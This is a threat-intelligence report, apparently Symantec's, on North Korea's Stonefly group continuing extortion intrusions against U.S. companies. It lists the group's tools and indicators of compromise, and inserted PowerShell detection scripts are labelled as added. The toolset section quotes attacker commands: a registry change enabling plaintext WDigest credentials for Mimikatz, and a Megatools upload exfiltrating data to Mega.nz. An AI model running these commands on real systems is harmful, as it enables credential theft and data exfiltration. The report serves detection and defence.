
Stonefly: Extortion Attacks Continue Against U.S. Targets

Attacks continue after indictment naming North Korean suspect.

Symantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45, Silent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the U.S., despite being the subject of an indictment and a multi-million dollar reward.

Symantec, part of Broadcom, found evidence of intrusions against three different organizations in the U.S. in August of this year, a month after the indictment was published. While the attackers didn’t succeed in deploying ransomware on the networks of any of the organizations affected, it is likely that the attacks were financially motivated. All the victims were private companies and involved in businesses with no obvious intelligence value. 

Attribution

In several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool is exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently documented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be unique to this campaign. 

Toolset

Preft: Multi-stage backdoor capable of downloading and uploading files, executing commands, and downloading additional plugins. Preft can support multiple plugin types, including executable files, VBS, BAT, and shellcode. It has multiple persistence modes, including Startup_LNK, Service, Registry, and Task Scheduler. 

Nukebot: Backdoor capable of executing commands, downloading and uploading files, and taking screenshots. Nukebot has not been associated with Stonefly before; however, its source code was leaked and this is likely how Stonefly obtained the tool.

Batch files: The attackers used a malicious batch file to enable plaintext credentials, modifying the registry to add:

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Mimikatz (see below) was then executed to dump credentials.

Mimikatz: Publicly available credential dumping tool. The attackers used a custom variant of the tool that writes harvested credentials to the file C:\Windows\Temp\KB0722.log. A similar custom variant of Mimikatz found on VirusTotal was linked by Mandiant to Stonefly.
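The WDigest registry change and the custom Mimikatz log path described above give a defender two host-level checks. The following PowerShell script is an added example, not code from the Symantec post: it audits UseLogonCredential under the WDigest key, optionally resets it, and reports whether the KB0722.log artifact exists. The function names and the choice of remediation are the example's own; run it from an elevated prompt.

```powershell
# Added example (not from the Symantec post): audit and remediate the WDigest
# UseLogonCredential setting the attackers enabled, and check for the log file
# the custom Mimikatz variant writes. Requires an elevated PowerShell session.

$WDigestKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$MimikatzLog = Join-Path $env:SystemRoot 'Temp\KB0722.log'

function Get-WDigestStatus {
    # Returns the current UseLogonCredential value, or $null when the value is
    # absent. Absent means the OS default applies, which is "do not cache
    # plaintext credentials" on Windows 8.1 / Server 2012 R2 and later.
    $item = Get-ItemProperty -Path $WDigestKey -Name 'UseLogonCredential' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.UseLogonCredential
}

function Test-StoneflyCredentialArtifacts {
    [CmdletBinding()]
    param([switch]$Remediate)

    $findings = @()
    $value = Get-WDigestStatus
    if ($value -eq 1) {
        $findings += 'WDigest UseLogonCredential=1: plaintext credentials are being cached in LSASS memory.'
        if ($Remediate) {
            # Setting the value to 0 stops new logons from being cached in plaintext;
            # secrets already in memory persist until the user logs off or the host reboots.
            Set-ItemProperty -Path $WDigestKey -Name 'UseLogonCredential' -Type DWord -Value 0
            $findings += 'Remediated: UseLogonCredential set to 0 (re-logon or reboot to flush cached secrets).'
        }
    }
    if (Test-Path -LiteralPath $MimikatzLog) {
        $info = Get-Item -LiteralPath $MimikatzLog
        $findings += "Found $MimikatzLog ($($info.Length) bytes, modified $($info.LastWriteTime)). Preserve it for incident response."
    }
    if ($findings.Count -eq 0) { $findings += 'No WDigest or KB0722.log indicators found.' }
    return $findings
}

Test-StoneflyCredentialArtifacts   # add -Remediate to reset the registry value
```

A value of 1 on a host where no administrator set it is itself worth an investigation, since the legitimate reasons for enabling WDigest plaintext caching are rare.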

Keyloggers: The attackers deployed two distinct keyloggers in their attacks: 

  • The first (SHA256: 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5) was a keylogger capable of stealing data from the clipboard. In addition to this, it logs when a program starts and captures which program’s keystrokes are input. Data captured is logged in a file named 0.log, which is archived into a ZIP archive named as a TMP file in the temporary directory with the password Pass@w0rd#384.
  • The second (SHA256: d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91) was a keylogger capable of stealing data from the clipboard. It logs stolen data into a randomly named DAT file in the temporary directory. 
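The first keylogger leaves two file-system artifacts a defender can sweep for: a 0.log file and a ZIP archive renamed with a .tmp extension in the temporary directory. The PowerShell below is an added example, not code from the Symantec post; the post does not say whether the user or the system temp directory is used, so the script checks both (an assumption), and identifies disguised archives by their ZIP magic bytes rather than by extension.

```powershell
# Added example (not from the Symantec post): hunt for the first keylogger's
# staging artifacts: a file named 0.log, and ZIP archives given a .tmp extension.
# Which temp directory the malware uses is not stated, so both are swept (assumption).

function Test-ZipMagic {
    param([string]$Path)
    try {
        # Read only the first four bytes; FileShare ReadWrite lets us peek at a file
        # the malware may still hold open.
        $fs = [System.IO.File]::Open($Path, 'Open', 'Read', 'ReadWrite')
        try {
            $buf  = New-Object byte[] 4
            $read = $fs.Read($buf, 0, 4)
        } finally { $fs.Dispose() }
    } catch { return $false }   # inaccessible file: skip rather than abort the sweep
    if ($read -lt 4) { return $false }
    $hex = ($buf | ForEach-Object { $_.ToString('X2') }) -join ''
    # 50 4B 03 04 = ZIP local file header, 50 4B 05 06 = empty ZIP archive
    return $hex -in @('504B0304', '504B0506')
}

function Find-KeyloggerArtifacts {
    $dirs = @($env:TEMP, (Join-Path $env:SystemRoot 'Temp')) | Sort-Object -Unique
    foreach ($dir in $dirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue | ForEach-Object {
            if ($_.Name -eq '0.log') {
                [pscustomobject]@{ Path = $_.FullName; Reason = 'Keystroke log named 0.log'; Modified = $_.LastWriteTime }
            } elseif ($_.Extension -eq '.tmp' -and (Test-ZipMagic $_.FullName)) {
                [pscustomobject]@{ Path = $_.FullName; Reason = 'ZIP archive disguised as .tmp'; Modified = $_.LastWriteTime }
            }
        }
    }
}

Find-KeyloggerArtifacts | Format-Table -AutoSize
```

Installers and updaters also sometimes stage ZIP data under a .tmp name, so a hit on the second rule needs triage (file owner, creation time, the process that wrote it) before it is treated as confirmed.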

Sliver: Open-source cross-platform penetration testing framework.

Chisel: Open-source proxy tool. It creates a TCP/UDP tunnel that is transported over HTTP and secured via SSH.

PuTTY: Publicly available SSH client.

Plink: A command-line connection tool for PuTTY.

Megatools: Command-line client for the Mega.nz cloud storage service. Megatools was used to perform data exfiltration:

CSIDL_WINDOWS\temp\mt.exe put -u [REMOVED] -p [REMOVED] CSIDL_WINDOWS\temp\sig.rar /Root 

Snap2HTML: Publicly available tool that takes snapshots of folder structures on a hard drive and saves them as HTML files.

FastReverseProxy (FRP): Open-source tool for exposing local servers to the public internet.

Background

On July 25, 2024, the U.S. Justice Department indicted a North Korean man named Rim Jong Hyok on charges related to the attack campaign. Rim is alleged to be a member of the Stonefly group, which is linked to the North Korean military intelligence agency, the Reconnaissance General Bureau (RGB). 

He was charged with being involved in extorting U.S. hospitals and other healthcare providers between 2021 and 2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against targets in the defense, technology, and government sectors worldwide. Targets of these follow-on attacks included two U.S. Air Force bases, NASA-OIG, and organizations located in Taiwan, South Korea, and China. In addition to the indictment, the U.S. Department of State offered a reward of up to $10 million for information on his location or identification.

Stonefly

Stonefly first came to notice in July 2009, when it mounted distributed denial-of-service (DDoS) attacks against a number of South Korean, U.S. government, and financial websites.

It reappeared again in 2011, when it launched more DDoS attacks, but also revealed an espionage element to its attacks when it was found to be using a sophisticated backdoor Trojan (Backdoor.Prioxer) against selected targets.

In March 2013, the group was linked to the Jokra (Trojan.Jokra) disk-wiping attacks against a number of South Korean banks and broadcasters. Three months later, the group was involved in a string of DDoS attacks against South Korean government websites.

In recent years, the group’s capabilities have grown markedly and, since at least 2019, Symantec has seen its focus shift mainly to espionage operations against select, high-value targets. It appears to specialize in targeting organizations that hold classified or highly sensitive information or intellectual property. While other North Korean groups are well known for mounting financial attacks driven by the need to raise foreign currency for the regime, Stonefly had until recent years appeared not to be involved in financially motivated attacks. 

Undeterred

While Stonefly’s move into financially motivated attacks is a relatively recent development, the spotlight shone on the group’s activities due to the indictment naming one of its members has not yet led to a cessation of activity. The group is likely continuing to attempt to mount extortion attacks against organizations in the U.S.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

Certificate 1

thumbprint = "313cffaac3d1576ca3c1cee8f9a68a15a24ff418"
issuer = "/CN=Baramundi Inc."
subject = "/CN=Baramundi Inc."
version = 3
algorithm = "sha1WithRSA"
algorithm_oid = "1.3.14.3.2.29"
serial = "af:6d:f9:f9:69:86:58:80:49:1e:2b:ae:20:9f:0d:12"
not_before = 1683852503
not_after = 2208988799
verified = 1
digest_alg = "sha1"
digest = "efe03d9be2cd148594e5fcb7272a40b85e33d2bf"
file_digest = "efe03d9be2cd148594e5fcb7272a40b85e33d2bf"
number_of_certificates = 1

Certificate 2

thumbprint = "10b8b939400a59d2cb79fff735796d484394f8dd"
issuer = "/CN=VEXIS SOFTWARE LTD."
subject = "/CN=VEXIS SOFTWARE LTD."
version = 3
algorithm = "sha1WithRSA"
algorithm_oid = "1.3.14.3.2.29"
serial = "bc:bf:05:4e:a8:b2:69:be:4c:c9:04:f0:8d:f9:eb:97"
not_before = 1710348691
not_after = 2208988799
verified = 1
digest_alg = "sha1"
digest = "b9b5d20438cf54acf33ee5731dc283554b8a044c"
file_digest = "b9b5d20438cf54acf33ee5731dc283554b8a044c"
number_of_certificates = 1
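Because the two certificates above are described as unique to this campaign, their thumbprints are a usable hunting key. The PowerShell below is an added example, not code from the Symantec post: it sweeps a set of directories for executables whose Authenticode signer matches either thumbprint. The directory list is an assumption and should be widened to wherever binaries are staged in your environment.

```powershell
# Added example (not from the Symantec post): find PE files signed with either
# certificate listed above. Both are self-signed (subject equals issuer), so
# Windows will not report the signature as Valid; the match is on thumbprint.

$StoneflyThumbprints = @(
    '313CFFAAC3D1576CA3C1CEE8F9A68A15A24FF418',   # Certificate 1, "Baramundi Inc."
    '10B8B939400A59D2CB79FFF735796D484394F8DD'    # Certificate 2, "VEXIS SOFTWARE LTD."
)

function Find-StoneflySignedFiles {
    param(
        # Assumption: common staging locations; extend for your environment.
        [string[]]$Roots = @($env:ProgramData, (Join-Path $env:SystemRoot 'Temp'), $env:TEMP)
    )
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -Include *.exe, *.dll, *.sys -ErrorAction SilentlyContinue |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
                if ($sig.SignerCertificate -and ($sig.SignerCertificate.Thumbprint -in $StoneflyThumbprints)) {
                    [pscustomobject]@{
                        Path       = $_.FullName
                        Subject    = $sig.SignerCertificate.Subject
                        Thumbprint = $sig.SignerCertificate.Thumbprint
                        Status     = $sig.Status      # not Valid for a self-signed certificate
                        SHA256     = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    }
                }
            }
    }
}

Find-StoneflySignedFiles | Format-List
```

The SHA256 of any match can be compared against the hashes in the post's indicator table; a signed file with one of these thumbprints but an unlisted hash is a candidate for submission to your sandbox or AV vendor.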

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.
